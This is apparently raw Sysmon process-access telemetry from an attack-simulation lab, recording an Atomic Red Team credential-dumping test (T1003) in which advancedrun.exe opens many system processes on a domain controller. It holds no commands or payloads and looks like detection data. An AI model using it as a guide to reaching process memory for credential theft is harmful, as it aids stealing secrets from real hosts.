17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943854Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943849Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
